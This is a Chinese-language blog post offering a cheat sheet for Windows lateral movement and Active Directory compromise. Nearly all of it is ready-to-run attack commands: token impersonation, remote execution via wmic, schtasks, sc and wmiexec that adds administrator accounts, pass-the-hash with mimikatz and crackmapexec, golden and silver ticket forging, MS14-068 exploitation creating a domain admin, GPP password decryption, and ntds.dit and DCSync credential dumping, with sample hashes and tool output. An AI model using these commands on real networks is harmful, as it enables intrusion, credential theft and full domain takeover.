<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Gemini","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="windows横向扩展常用命令">
<meta property="og:type" content="article">
<meta property="og:title" content="windows横向扩展tips">
<meta property="og:url" content="http://yoursite.com/2020/03/04/windows%E6%A8%AA%E5%90%91%E6%89%A9%E5%B1%95tips/index.html">
<meta property="og:site_name" content="ceeeeeeb&#39;s blog">
<meta property="og:description" content="windows横向扩展常用命令">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-03-04T08:06:49.000Z">
<meta property="article:modified_time" content="2020-03-04T08:11:43.795Z">
<meta property="article:author" content="ceeeeeeb">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yoursite.com/2020/03/04/windows%E6%A8%AA%E5%90%91%E6%89%A9%E5%B1%95tips/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>windows横向扩展tips | ceeeeeeb's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ceeeeeeb's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/04/windows%E6%A8%AA%E5%90%91%E6%89%A9%E5%B1%95tips/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ceeeeeeb">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ceeeeeeb's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          windows横向扩展tips
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-03-04 16:06:49 / Modified: 16:11:43" itemprop="dateCreated datePublished" datetime="2020-03-04T16:06:49+08:00">2020-03-04</time>
            </span>

          
            <div class="post-description">windows横向扩展常用命令</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="windows横向渗透"><a href="#windows横向渗透" class="headerlink" title="windows横向渗透"></a>windows横向渗透</h2><h3 id="入口点"><a href="#入口点" class="headerlink" title="入口点"></a>入口点</h3><p>1.能出网 frp socks5。</p>
<p>代理msf进内网，可利用永恒之蓝（防火墙开启情况下未能成功），弱口令爆破，常见的kali下漏洞攻击。</p>
<p>2.webshell（不能出网）狗洞，冰蝎自带端口转发功能。</p>
<p>3.vpn（可进行smb协议类利用，如pth，net use等。socks不支持smb协议代理）</p>
<h3 id="提权-amp-降权"><a href="#提权-amp-降权" class="headerlink" title="提权&amp;降权"></a>提权&amp;降权</h3><h4 id="降权"><a href="#降权" class="headerlink" title="降权"></a>降权</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">1.incognito.exe</span><br><span class="line">incognito.exe list_tokens -u</span><br><span class="line">incognito.exe execute -c &quot;NT AUTHORITY\SYSTEM&quot; cmd.exe</span><br><span class="line">incognito.exe execute -c &quot;WIN-R7MM90ERBMD\a&quot; cmd.exe</span><br><span class="line"></span><br><span class="line">2.Invoke-TokenManipulation</span><br><span class="line">Invoke-TokenManipulation -Enumerate</span><br><span class="line">提权至system：Invoke-TokenManipulation -CreateProcess “cmd.exe” -Username “nt authority\system”</span><br><span class="line">复制进程token：Invoke-TokenManipulation -CreateProcess “cmd.exe” -ProcessId 500</span><br><span class="line">复制线程token：Invoke-TokenManipulation -CreateProcess “cmd.exe” -ThreadId 500</span><br></pre></td></tr></table></figure>

<h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h4><p><strong>system</strong></p>
<p><a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener">windows提权</a></p>
<p><strong>bypassUAC</strong></p>
<p><code>UACME</code></p>
<h3 id="远程执行命令方法"><a href="#远程执行命令方法" class="headerlink" title="远程执行命令方法"></a>远程执行命令方法</h3><p>1.at（系统权限）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">利用计划任务at命令，常用的方法（系统权限）：</span><br><span class="line"></span><br><span class="line">net time</span><br><span class="line"></span><br><span class="line">at \\127.0.0.1 23:00 c:\winnt\system32&#x2F;viliosn.exe</span><br><span class="line"></span><br><span class="line">at \\127.0.0.1 1 delete &#x2F;yes #删除本机1号任务</span><br></pre></td></tr></table></figure>

<p>2.schtasks(用户权限即可)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;create &#x2F;tn asp_net &#x2F;tr &quot;c:\windows\system32\cmd.exe &#x2F;c cmd&quot; &#x2F;sc once &#x2F;st 00:00 &#x2F;S ip &#x2F;RU System &#x2F;u user &#x2F;p password</span><br><span class="line"></span><br><span class="line">schtasks &#x2F;run &#x2F;tn asp_net &#x2F;S ip &#x2F;u user &#x2F;p password &#x2F;i</span><br><span class="line"></span><br><span class="line">schtasks &#x2F;F &#x2F;delete &#x2F;tn asp_net &#x2F;S ip &#x2F;u user &#x2F;p password</span><br></pre></td></tr></table></figure>

<p>3.sc 系统权限的sc用法 利用服务工具，指定用户权限启动</p>
<p>在192.130.16.22上创建一个xxoox的服务，程序执行命令为cmd.exe /c start c:\programdata\a+.bat</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">sc \\192.130.16.22 create xxoox binPath&#x3D; &quot;cmd.exe &#x2F;c start c:\programdata\a+.bat&quot;</span><br><span class="line">执行xxoox的服务，执行成功可能会提示错误1053，不宜作为启动项，一般用用户权限也是临时的：</span><br><span class="line"></span><br><span class="line">sc \\192.130.16.22 start xxoox</span><br><span class="line"></span><br><span class="line">sc \\192.130.16.22 delete xxoox</span><br><span class="line">指定用户权限启动的用法</span><br><span class="line">在192.130.16.22上指定administrator账户创建一个adminsec服务：</span><br><span class="line"></span><br><span class="line">sc \\192.130.16.22 create adminsec binpath &#x3D; “c:\pass.exe” obj&#x3D; “adminsec\administrator” passwrod&#x3D; adminsec</span><br><span class="line"></span><br><span class="line">sc \\192.130.16.22 start adminsec</span><br></pre></td></tr></table></figure>

<p><strong>4.wmic</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">wmic &#x2F;node:192.168.17.138 &#x2F;user:test &#x2F;password:!@#123QWE process call create c:\programdata\test.bat</span><br><span class="line"></span><br><span class="line">###在远程系统上执行单条命令</span><br><span class="line">wmic &#x2F;node:192.168.17.138 &#x2F;user:test &#x2F;password:!@#123QWE process call create &quot;cmd.exe &#x2F;c net user test1 !@#123QWE &#x2F;add &amp;&amp; net localgroup administrators test1 &#x2F;add</span><br><span class="line"></span><br><span class="line">#在远程系统上运行exe文件</span><br><span class="line">wmic &#x2F;node:192.168.200.20 &#x2F;user:web\administrator &#x2F;password:Web12345 process call create &quot;cmd.exe &#x2F;c calc.exe&quot;</span><br></pre></td></tr></table></figure>

<p><strong>5.wmiexec.vbs</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">###获取半交互式shell</span><br><span class="line">cscript.exe &#x2F;&#x2F;nologo wmiexec.vbs &#x2F;shell 192.168.17.138 test !@#123QWE</span><br><span class="line">###在远程系统上执行单条命令</span><br><span class="line">cscript.exe wmiexec.vbs &#x2F;cmd 192.168.17.138 test !@#123QWE &quot;cmdkey &#x2F;list&quot;</span><br><span class="line">###在远程系统上执行 bat 脚本</span><br><span class="line">cscript.exe wmiexec.vbs &#x2F;cmd 192.168.17.138 test !@#123QWE c:\programdata\test.bat</span><br></pre></td></tr></table></figure>

<p><strong>6.PsRemoting</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#先开启执行策略</span><br><span class="line">set-executionpolicy unrestricted</span><br><span class="line">#在目标机器上开启ps远程功能</span><br><span class="line">enable-psremoting</span><br><span class="line">#开启远程连接</span><br><span class="line">Enter-PSSession 192.168.200.20 -Credential  administrator</span><br></pre></td></tr></table></figure>



<h3 id="工作组渗透"><a href="#工作组渗透" class="headerlink" title="工作组渗透"></a>工作组渗透</h3><h4 id="密码喷射"><a href="#密码喷射" class="headerlink" title="密码喷射"></a>密码喷射</h4><h4 id="17-010-08-067等溢出漏洞"><a href="#17-010-08-067等溢出漏洞" class="headerlink" title="17-010,08-067等溢出漏洞"></a>17-010,08-067等溢出漏洞</h4><h4 id="常规web-服务渗透"><a href="#常规web-服务渗透" class="headerlink" title="常规web,服务渗透"></a>常规web,服务渗透</h4><h5 id="常见应用漏洞："><a href="#常见应用漏洞：" class="headerlink" title="常见应用漏洞："></a>常见应用漏洞：</h5><p>struts2、zabbix、axis、ImageMagic、fastcgi、Shellshock、redis未授权访问、Hadoop、weblogic、jboss、WebSphere、Coldfusion</p>
<h5 id="常见语言反序列化漏洞"><a href="#常见语言反序列化漏洞" class="headerlink" title="常见语言反序列化漏洞"></a>常见语言反序列化漏洞</h5><p>php、Java、python、ruby、node.js</p>
<h5 id="数据库漏洞及配置不当"><a href="#数据库漏洞及配置不当" class="headerlink" title="数据库漏洞及配置不当"></a>数据库漏洞及配置不当</h5><p>mssql Get-SQLServerAccess、MySQL低版本hash登陆、MySQL低版本Authentication Bypass、域内mssql凭证获取密码、monggodb未授权访问、memcache配置不当<br>内网中很多web应用存在常见漏洞、使用有漏洞的中间件和框架、弱口令及配置不当（注入、任意文件读取、备份、源码泄漏（rsync、git、svn、DS_Store）、代码执行、xss、弱口令、上传漏洞、权限绕过…）</p>
<h5 id="web应用、及数据库中寻找其他服务器密码信息（ftp、mail、smb、ldap存储、sql…）"><a href="#web应用、及数据库中寻找其他服务器密码信息（ftp、mail、smb、ldap存储、sql…）" class="headerlink" title="web应用、及数据库中寻找其他服务器密码信息（ftp、mail、smb、ldap存储、sql…）"></a>web应用、及数据库中寻找其他服务器密码信息（ftp、mail、smb、ldap存储、sql…）</h5><h5 id="系统备份文件（ghost）中读密码"><a href="#系统备份文件（ghost）中读密码" class="headerlink" title="系统备份文件（ghost）中读密码"></a>系统备份文件（ghost）中读密码</h5><p>在已有控制权限主机中，查看各浏览器书签、cookie、存储密码、键盘记录收集相关敏感信息、查询注册表中保存密码、读取各客户端连接密码、putty dll注入、putty密码截取、ssh连接密码，以获取更多主机权限</p>
<h4 id="ntlm-relay"><a href="#ntlm-relay" class="headerlink" title="ntlm relay"></a>ntlm relay</h4><h3 id="域渗透"><a href="#域渗透" class="headerlink" title="域渗透"></a>域渗透</h3><h4 id="pth"><a href="#pth" class="headerlink" title="pth"></a>pth</h4><p>kb2871997，<strong>禁止本地管理员账户用于远程连接，这样就无法以本地管理员用户的权限执行wmi、PSEXEC、schtasks、at和访问文件共享。</strong></p>
<p>这个补丁发布后常规的Pass The Hash已经无法成功，唯独默认的 Administrator (SID 500)账号例外，利用这个账号仍可以进行Pass The Hash远程连接。</p>
<p><strong>1.mimikatz</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sekurlsa::pth &#x2F;user:mssql &#x2F;domain:de1ay &#x2F;ntlm:161cff084477fe596a5db81874498a24</span><br><span class="line">net use \\192.168.5.3\c$</span><br><span class="line">对于8.1&#x2F;2012r2，安装补丁kb2871997的Win 7&#x2F;2008r2&#x2F;8&#x2F;2012，可以使用AES keys代替NT hash</span><br></pre></td></tr></table></figure>

<p><strong>2.wmiexec&amp;smbexec</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">wmiexec.exe -hashes 00000000000000000000000000000000:4aa0f66b8059750e6e410122cdf05ce2 offensive&#x2F;dbadmin@192.168.1.20 &quot;whoami&quot;</span><br><span class="line"></span><br><span class="line">Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies</span><br><span class="line">[*] SMBv3.0 dialect used</span><br><span class="line">offensive\dbadmin</span><br><span class="line"></span><br><span class="line">Invoke-WMIExec -Target 192.168.1.1 -Domain test.local -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command &quot;calc.exe&quot; -verbose</span><br><span class="line"></span><br><span class="line">Invoke-SMBExec -Target 192.168.0.2 -Domain test.local -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command &quot;calc.exe&quot; -verbose</span><br></pre></td></tr></table></figure>

<p><strong>3.crackmapexec批量pth</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">crackmapexec 192.168.3.0&#x2F;24 -u administrator -H ccef208c6485269c20db2cad21734fe7</span><br></pre></td></tr></table></figure>

<h4 id="ptt"><a href="#ptt" class="headerlink" title="ptt"></a>ptt</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">kekeo &quot;tgt::ask &#x2F;user:dbadmin &#x2F;domain:offensive.local &#x2F;ntlm:4aa0f66b8059750e6e410122cdf05ce2&quot;</span><br><span class="line"> &gt; Ticket in file &#39;TGT_dbadmin@OFFENSIVE.LOCAL_krbtgt~offensive.local@OFFENSIVE.LOCAL.kirbi&#39;</span><br><span class="line"> </span><br><span class="line">kekeo &quot;kerberos::ptt TGT_dbadmin@OFFENSIVE.LOCAL_krbtgt~offensive.local@OFFENSIVE.LOCAL.kirbi&quot;</span><br><span class="line">* File: &#39;TGT_administrator@OFFENSIVE.LOCAL_krbtgt~offensive.local@OFFENSIVE.LOCAL.kirbi&#39;: OK</span><br><span class="line"></span><br><span class="line">net use \\dc\c$</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">golden</span><br><span class="line">&#x2F;domain:test.local</span><br><span class="line">&#x2F;sid:S-1-5-21-4155807533-921486164-2767329826</span><br><span class="line">&#x2F;target:WIN-8VVLRPIAJB0.test.local</span><br><span class="line">&#x2F;service:cifs</span><br><span class="line">&#x2F;rc4:d5304f9ea69523479560ca4ebb5a2155</span><br><span class="line">&#x2F;user:silver</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">mimikatz &quot;kerberos::golden &#x2F;domain:test.local &#x2F;sid:S-1-5-21-4155807533-921486164-2767329826 &#x2F;target:WIN-8VVLRPIAJB0.test.local &#x2F;service:cifs &#x2F;rc4:d5304f9ea69523479560ca4ebb5a2155 &#x2F;user:silver &#x2F;ptt&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#x2F;domain:test.local</span><br><span class="line">&#x2F;sid:S-1-5-21-4155807533-921486164-2767329826</span><br><span class="line">&#x2F;target:WIN-8VVLRPIAJB0.test.local</span><br><span class="line">&#x2F;service:LDAP</span><br><span class="line">&#x2F;rc4:d5304f9ea69523479560ca4ebb5a2155</span><br><span class="line">&#x2F;user:krbtgt</span><br><span class="line"></span><br><span class="line">mimikatz &quot;kerberos::golden &#x2F;domain:test.local &#x2F;sid:S-1-5-21-4155807533-921486164-2767329826 &#x2F;target:WIN-8VVLRPIAJB0.test.local &#x2F;service:LDAP &#x2F;rc4:d5304f9ea69523479560ca4ebb5a2155 &#x2F;user:krbtgt &#x2F;ptt&quot;</span><br><span class="line"></span><br><span class="line">利用ptt导hash：mimikatz &quot;lsadump::dcsync &#x2F;dc:WIN-8VVLRPIAJB0.test.local &#x2F;domain:test.local &#x2F;user:krbtgt&quot;</span><br></pre></td></tr></table></figure>

<h4 id="金票"><a href="#金票" class="headerlink" title="金票"></a>金票</h4><p>伪造黄金凭据需要具备下面条件：</p>
<ul>
<li>krbtgt用户的hash(就意味着你已经有域控制器权限了)</li>
<li>域名称</li>
<li>域的SID值</li>
<li>要伪造的用户名</li>
</ul>
<p>1.先登录域控制器，dump krbtgt用户的hash值,获取域sid</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line"></span><br><span class="line">lsadump::lsa &#x2F;patch</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">SAM Username         : krbtgt</span><br><span class="line">Account Type         : 30000000 ( USER_OBJECT )</span><br><span class="line">User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )</span><br><span class="line">Account expiration   :</span><br><span class="line">Password last change : 8&#x2F;18&#x2F;2019 3:35:31 AM</span><br><span class="line">Object Security ID   : S-1-5-21-1187620287-4058297830-2395299116-502</span><br><span class="line">Object Relative ID   : 502</span><br><span class="line">Credentials:</span><br><span class="line">  Hash NTLM: 61d83c569b93bfcd4ca2087011361caa</span><br><span class="line">    ntlm- 0: 61d83c569b93bfcd4ca2087011361caa</span><br><span class="line">    lm  - 0: 8a0c759ba84902c107491a110cc5eb11</span><br><span class="line"></span><br><span class="line">Supplemental Credentials:</span><br><span class="line">* Primary:NTLM-Strong-NTOWF *</span><br><span class="line">    Random Value : 03e46263c90a310e6120dbb0443d2775</span><br><span class="line"></span><br><span class="line">* Primary:Kerberos-Newer-Keys *</span><br><span class="line">    Default Salt : OFFENSIVE.LOCALkrbtgt</span><br><span class="line">    Default Iterations : 4096</span><br><span class="line">    Credentials</span><br><span class="line">      aes256_hmac       (4096) : dbae18467bd2eeb7eb2679e759b2b14d0755c1a4c3757b2f475399bb4ddb73b2</span><br><span class="line">      aes128_hmac       (4096) : acf72b52482ca2fd5e3b4b7b4082bb98</span><br><span class="line">      des_cbc_md5       (4096) : 26cdb9166b8a5897</span><br></pre></td></tr></table></figure>
<p>2.切换到普通域用户的机器，生成TGT凭证,用户名为administrator</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">(1)</span><br><span class="line">kerberos::golden  &#x2F;admin:darthvader  &#x2F;domain:offensive.local  &#x2F;sid:S-1-5-21-1187620287-4058297830-2395299116-502 &#x2F;krbtgt:61d83c569b93bfcd4ca2087011361caa  &#x2F;ptt</span><br><span class="line"></span><br><span class="line">(2)</span><br><span class="line">mimikatz &quot;kerberos::golden &#x2F;domain:offensive.local &#x2F;sid:S-1-5-21-1187620287-4058297830-2395299116-502 &#x2F;aes256:dbae18467bd2eeb7eb2679e759b2b14d0755c1a4c3757b2f475399bb4ddb73b2 &#x2F;user:god</span><br><span class="line">&#x2F;ticket:gold.kirbi&quot;</span><br></pre></td></tr></table></figure>
<p>3.然后使用mimikatz将凭证注入进去,攻击成功:</p>
<p><code>mimikatz &quot;kerberos::ptt gold.kirbi&quot;</code></p>
<p>4.net use或者pstools即可连接</p>
<h4 id="银票"><a href="#银票" class="headerlink" title="银票"></a>银票</h4><p>1.先登录域控制器，dump krbtgt用户的hash值,获取域sid</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line"></span><br><span class="line">lsadump::lsa &#x2F;patch</span><br></pre></td></tr></table></figure>
<p>2.将hash保存下来，在普通域用户机器中进行ptt</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::golden &#x2F;domain:god.org &#x2F;sid:S-1-5-21-1218902331-2157346161-1782232778  &#x2F;target:192.168.3.21 &#x2F;rc4:8432d4fa4430ecf56927dbabd1b4d36b  &#x2F;service:cifs &#x2F;user:mary &#x2F;ptt</span><br></pre></td></tr></table></figure>

<p>3.net use或者pstools即可连接</p>
<h4 id="ms14-068"><a href="#ms14-068" class="headerlink" title="ms14-068"></a>ms14-068</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">登录普通域用户mssql，cmd中输入&quot;whoami&#x2F;user&quot;获取sid  </span><br><span class="line">de1ay\mssql S-1-5-21-2756371121-2868759905-3853650604-2103</span><br><span class="line"></span><br><span class="line">ms14-068.exe -u mssql@de1ay.com -p 1qaz@WSX -s S-1-5-21-2756371121-2868759905-3853650604-2103 -d dc.de1ay.com  </span><br><span class="line"></span><br><span class="line">Mimikatz.exe &quot;kerberos::ptc TGT_mssql@de1ay.com.ccache&quot; exit</span><br><span class="line"></span><br><span class="line">net use \\dc\admin$  </span><br><span class="line"></span><br><span class="line">dir \\dc\c$</span><br><span class="line"></span><br><span class="line">pstools 添加域管，导出密码</span><br><span class="line">net user wangergou ABCabc123 &#x2F;add &#x2F;domain</span><br><span class="line">net group &quot;Domain admins&quot; wangergou &#x2F;add &#x2F;domain</span><br></pre></td></tr></table></figure>

<h4 id="GPP漏洞利用"><a href="#GPP漏洞利用" class="headerlink" title="GPP漏洞利用"></a>GPP漏洞利用</h4><hr>
<p>win2008增加，一般域用户都可访问敏感文件<br>密码存在SYSCOL目录下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Groups.xml, 这个文件是域管通过GPP设置或修改本地密码留下的</span><br><span class="line">Services\Services.xml,</span><br><span class="line">ScheduledTasks\ScheduledTasks.xml,</span><br><span class="line">Printers\Printers.xml,</span><br><span class="line">Drives\Drives.xml,</span><br><span class="line">DataSources\DataSources.xml</span><br><span class="line">net use \\域控(如pc.xx.com) password &#x2F;user:xxx.com\username </span><br><span class="line">dir \\域控\SYSVOL &#x2F;s &#x2F;a &gt; sysvol.txt</span><br><span class="line">findstr &#x2F;i &quot;groups.xml&quot; sysvol.txt</span><br></pre></td></tr></table></figure>

<p>找到cpassword<br>解密过程：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">set-executionPolicy bypass</span><br><span class="line">powershell -ep bypass     启动ps</span><br><span class="line">Import-Module .\GPP.ps1</span><br><span class="line">Get-DecryptedCpassword  xxxxxxxxxxxxxx</span><br></pre></td></tr></table></figure>

<h4 id="导出域控ntds-dit"><a href="#导出域控ntds-dit" class="headerlink" title="导出域控ntds.dit"></a>导出域控ntds.dit</h4><ul>
<li>交互式<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil</span><br><span class="line">activate instance ntds</span><br><span class="line">ifm</span><br><span class="line">create full C:\ntdsutil</span><br><span class="line">quit</span><br><span class="line">quit</span><br></pre></td></tr></table></figure></li>
<li>mimikatz</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug lsadump::lsa &#x2F;inject</span><br></pre></td></tr></table></figure>
<ul>
<li>invoke-dcsync</li>
</ul>
<p><code>Invoke-DCSync -PWDumpFormat</code></p>
<ul>
<li>远程</li>
</ul>
